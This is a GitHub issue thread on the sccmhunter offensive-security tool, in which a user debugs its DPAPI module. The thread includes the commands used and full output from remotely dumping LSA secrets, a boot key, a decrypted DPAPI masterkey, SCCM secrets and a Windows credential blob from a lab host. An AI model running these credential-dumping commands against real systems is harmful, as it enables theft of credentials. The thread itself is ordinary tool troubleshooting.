garrettfoster13 / sccmhunter


Issue with the DPAPI #31

Closed Cyb3rGh0st786 closed 11 months ago

Cyb3rGh0st786 commented 11 months ago

Hello @garrettfoster13, @RalphDesmangles

I have tried to use the DPAPI module and I am getting the following error.

```
python3 sccmhunter.py dpapi -u Test -d test.com -target 172.16.x.x -p Testpassword
```

```
                                                                                          (
                                    888                         d8                         \
 dP"Y  e88'888  e88'888 888 888 8e  888 ee  8888 8888 888 8e   d88    ,e e,  888,8,        )
C88b  d888  '8 d888  '8 888 888 88b 888 88b 8888 8888 888 88b d88888 d88 88b 888 "    ##-------->
 Y88D Y888   , Y888   , 888 888 888 888 888 Y888 888P 888 888  888   888   , 888           )
d,dP   "88,e8'  "88,e8' 888 888 888 888 888  "88 88"  888 888  888    "YeeP" 888          /
                                                                                         (
                                                                 v0.0.2
                                                                 @garrfoster

[12:02:53] INFO     [*] Querying SCCM configuration via WMI
[12:02:53] INFO     [+] Got 2 SCCM secrets.
[12:02:53] INFO     [+] Credential file found: DFBE70A7E5CC19A398EBF1B96859CE5D
[12:02:53] INFO     [+] Retrieving credential file: DFBE70A7E5CC19A398EBF1B96859CE5D
[12:02:53] INFO     [+] Retrieving masterkey file: C829C67B-4573-4D92-9ECD-AC9609F3E6C1
[12:02:54] INFO     [!] LSA hashes extraction failed: 'HashRecords'
Exception ignored in: <function Registry.__del__ at 0x7f6d22ea7920>
Traceback (most recent call last):
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/winregistry.py", line 182, in __del__
    self.close()
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/winregistry.py", line 179, in close
    self.fd.close()
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/examples/secretsdump.py", line 356, in close
    self.__smbConnection.closeFile(self.__tid, self.__fid)
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smbconnection.py", line 603, in closeFile
    return self._SMBConnection.close(treeId, fileId)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smb3.py", line 1271, in close
    packetID = self.sendSMB(packet)
               ^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smb3.py", line 423, in sendSMB
    self._NetBIOSSession.send_packet(packet)
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/nmb.py", line 912, in send_packet
    self._sock.sendall(p.rawData())
OSError: [Errno 9] Bad file descriptor
```

I have used the systemdpapidump.py module, and it works fine.

RalphDesmangles commented 11 months ago

@kaleemshaik7867 What OS is the SCCM client running? Do you mind sharing SystemDPAPI.py -debug output?

I also added additional logging on my fork; you can just pass -debug: https://github.com/RalphDesmangles/sccmhunter/tree/main

Cyb3rGh0st786 commented 11 months ago

Hello @RalphDesmangles ,

The client is running on the below.

Edition: Windows 11 Pro
Version: 22H2
Installed on: 06/10/2023
OS build: 22621.2715
Experience: Windows Feature Experience Pack 1000.22677.1000.0

Here is the output of the dpapi script. It seems there is an issue while decrypting the master key. I have changed the username and secrets in the output below.

```
SystemDPAPIdump.py adlabone.com/Test@172.16.53.12 -debug
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b261 - Copyright 2022 Fortra - forked by ThePorgs

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket
Password:
[*] Querying SCCM configuration via WMI
[+] Target system is 172.16.53.12 and isFQDN is False
[+] StringBinding: pc[51070]
[+] StringBinding: 172.16.53.12[51070]
[+] StringBinding chosen: ncacn_ip_tcp:172.16.53.12[51070]
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/EGG-INFO/scripts/SystemDPAPIdump.py", line 137, in dump
    pEnum = iEnum.Next(0xffffffff,1)[0]
            ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/dcom/wmi.py", line 2947, in Next
    resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/dcomrt.py", line 1329, in request
    resp = dce.request(req, uuid)
           ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
    raise exception
impacket.dcerpc.v5.dcom.wmi.DCERPCSessionError: WMI Session Error: code: 0x1 - WBEM_S_FALSE
[*] Got 2 SCCM secrets.
[*] Credential file found: DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Retrieving credential file: DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Retrieving masterkey file: C829C67B-4573-4D92-9ECD-AC9609F3E6C1
[+] Service RemoteRegistry is already running
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x545aa854f327d07deca3ec602c5c74d5
[+] Saving remote SECURITY database
[*] Dumping LSA Secrets
[+] Decrypting LSA Key
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
[+] Looking into DefaultPassword
[+] Discarding secret DefaultPassword, NULL Data
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
[+] Looking into DSREGCMD
[+] Unknown type 0xb''
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/EGG-INFO/scripts/SystemDPAPIdump.py", line 258, in dump
    self.__LSASecrets.dumpSecrets()
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/examples/secretsdump.py", line 1799, in dumpSecrets
    value = self.getValue('\\Policy\\Secrets\\{}\\{}\\default'.format(key,valueType))
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/examples/secretsdump.py", line 1233, in getValue
    value = self.__registryHive.getValue(keyValue)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 458, in getValue
    key = self.findKey(regKey)
          ^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 378, in findKey
    res = self.__findSubKey(parentKey, subKey)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 299, in __findSubKey
    data = lf['HashRecords']
           ~~^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/structure.py", line 169, in __getitem__
    return self.fields[key]
           ~~~~~~~~~~~^^^^^
KeyError: 'HashRecords'
[-] LSA hashes extraction failed: 'HashRecords'
[*] Cleaning up...
[*] Decrypted masterkey C829C67B-4573-4D92-9ECD-AC9609F3E6C1: 0x43dae8247fd77b2377072fa03cb62925ced5b65659a7eebb4ad3b714a36afbc0a4f05eae597b2b188a0874a8e7c89765a4b147c5ff5737f499365ea60d8bc148
[*] Decrypting SCCM secret 0
TestPassword
[*] Decrypting SCCM secret 1
example\Testuser
[*] Decrypting credential DFBE70A7E5CC19A398EBF1B96859CE5D
[CREDENTIAL]
LastWritten : 2023-10-06 11:12:44
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown     :
Username    : 02akkplqndhhbeze
Unknown     :

KeyWord : Microsoft_WindowsLive:authstate:0
Data    :
 0000   01 00 00 00 D0 8C 9D DF  01 15 D1 11 8C 7A 00 C0   .............z..
 0010   4F C2 97 EB 01 00 00 00  7B C6 29 C8 73 45 92 4D   O.......{.).sE.M
 0020   9E CD AC 96 09 F3 E6 C1  00 00 00 00 02 00 00 00   ................
 0030   00 00 10 66 00 00 00 01  00 00 20 00 00 00 A2 83   ...f...... .....
 0040   75 0E AF F3 98 D3 88 D1  EB 7B 80 49 F2 BE EC E2   u........{.I....
 0050   DA D4 DB 5B EF E1 61 B5  7F 88 7F 96 2F 8D 00 00   ...[..a...../...
 0060   00 00 0E 80 00 00 00 02  00 00 20 00 00 00 75 FF   .......... ...u.
 0070   E0 07 4A EC 32 E6 A8 55  BE 4D 79 A0 A7 F2 11 C3   ..J.2..U.My.....
 0080   EC E5 1F BA F2 8E 1B 5B  FF 0A 68 6F 3F 23 90 1F   .......[..ho?#..
 0090   00 00 A5 73 21 B4 EE 4E  65 25 EF A9 D6 B2 2F FC   ...s!..Ne%..../.
 00a0   E3 0E B8 A8 8A 4D 67 73  C2 6A DE E9 E4 44 8A 6C   .....Mgs.j...D.l
 00b0   BA 57 B5 2F 77 5C 5B 7E  29 39 4E 54 06 45 01 EC   .W./w\[~)9NT.E..
 00c0   A4 30 EC 95 74 5E 3A 45  5D FE AE 3F 49 2F 2A 1E   .0..t^:E]..?I/*.
 00d0   28 80 81 4A B7 1E F5 B0  CA 66 36 23 BB A2 EB E5   (..J.....f6#....
 00e0   C1 AA 1B 88 6E A4 6E 7D  59 A8 9F B1 DC C9 38 2C   ....n.n}Y.....8,
 00f0   B4 74 A4 29 10 63 11 4E  FA 50 E4 8E 81 BF EE 6F   .t.).c.N.P.....o
KeyWord : Microsoft_WindowsLive:authstate:1
```

garrettfoster13 commented 11 months ago

@kaleemshaik7867

Could you pull the dev branch and test the changes to the dpapi module?

Cyb3rGh0st786 commented 11 months ago

Thank you @garrettfoster13, it worked.
